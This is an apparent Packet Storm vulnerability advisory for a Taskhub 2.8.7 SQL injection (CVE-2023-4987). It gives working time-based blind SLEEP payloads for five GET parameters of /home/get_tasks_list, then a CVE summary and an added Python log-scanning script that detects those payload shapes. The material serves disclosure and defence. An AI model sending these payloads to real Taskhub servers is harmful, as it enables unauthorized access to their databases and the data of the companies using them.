Taskhub 2.8.7 SQL Injection

Taskhub version 2.8.7 suffers from a remote SQL injection vulnerability.

Packet Storm
# Exploit Title: taskhub 2.8.7 - SQL Injection
# Exploit Author: CraCkEr
# Date: 05/09/2023
# Vendor: Infinitie Technologies
# Vendor Homepage: https://www.infinitietech.com/
# Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
# Demo: https://taskhub.company/auth
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4987
# CWE: CWE-89 - CWE-74 - CWE-707

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.

Path: /home/get_tasks_list

GET parameter 'project' is vulnerable to SQL Injection
GET parameter 'status' is vulnerable to SQL Injection
GET parameter 'user_id' is vulnerable to SQL Injection
GET parameter 'sort' is vulnerable to SQL Injection
GET parameter 'search' is vulnerable to SQL Injection

https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]

---
Parameter: project (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

Parameter: status (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

Parameter: user_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

Parameter: sort (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=

Parameter: search (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW
---

[-] Done

Related news

CVE-2023-4987

A vulnerability, which was classified as critical, has been found in infinitietech taskhub 2.8.7. Affected by this issue is some unknown functionality of the file /home/get_tasks_list of the component GET Parameter Handler. The manipulation of the argument project/status/user_id/sort/search leads to sql injection. VDB-239798 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
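
A defender-side log check for the five parameters named above, as an added example that is not part of the advisory or of Taskhub's code. It flags requests to /home/get_tasks_list whose values fall outside an expected shape and marks slow responses, which is how a time-based blind probe shows up in access logs. The log format ("URL seconds"), the value shapes, the sort allowlist and the 5-second threshold are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/home/get_tasks_list"
# Assumed value shapes; adjust to the real schema before use.
SORT_COLUMNS = {"", "id", "title", "status", "due_date"}  # hypothetical allowlist
# Heuristic for the free-text field: SQL function calls and comment openers.
SQL_MARKERS = re.compile(r"(?i)\b(select|sleep|benchmark)\s*\(|--\s|/\*")

CHECKS = {
    "project": lambda v: re.fullmatch(r"\d*", v) is not None,
    "user_id": lambda v: re.fullmatch(r"\d*", v) is not None,
    "status": lambda v: re.fullmatch(r"[A-Za-z0-9_-]*", v) is not None,
    "sort": lambda v: v in SORT_COLUMNS,
    "search": lambda v: SQL_MARKERS.search(v) is None,
}

def flag_request(url):
    """Return sorted names of the advisory-listed parameters that fail their check."""
    parts = urlsplit(url)
    if parts.path != ENDPOINT:
        return []
    # parse_qs percent-decodes values, so encoded quotes and spaces are seen.
    params = parse_qs(parts.query, keep_blank_values=True)
    return sorted({name for name, ok in CHECKS.items()
                   for value in params.get(name, []) if not ok(value)})

def scan(lines, slow_seconds=5.0):
    """Return (line_number, flagged_params, slow) for each suspicious log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        url, _, seconds = line.rpartition(" ")
        flagged = flag_request(url)
        if flagged:
            hits.append((number, flagged, float(seconds) >= slow_seconds))
    return hits

# Constructed sample log lines: one ordinary request, then two requests
# carrying the sort and search payload shapes quoted in the advisory.
SAMPLE_LOG = [
    "/home/get_tasks_list?project=4&status=todo&workspace_id=1&user_id=23&sort=id&order=desc&search=report 0.21",
    "/home/get_tasks_list?project=&status=&user_id=23&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&search= 6.30",
    "/home/get_tasks_list?project=&status=&user_id=23&sort=id&search=%27)%20AND%20(SELECT(0)FROM(SELECT(SLEEP(7)))a)--%20wXyW 7.12",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The search check is a heuristic and can misfire on legitimate free text; the strict checks on project, user_id, status and sort are the reliable signal.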
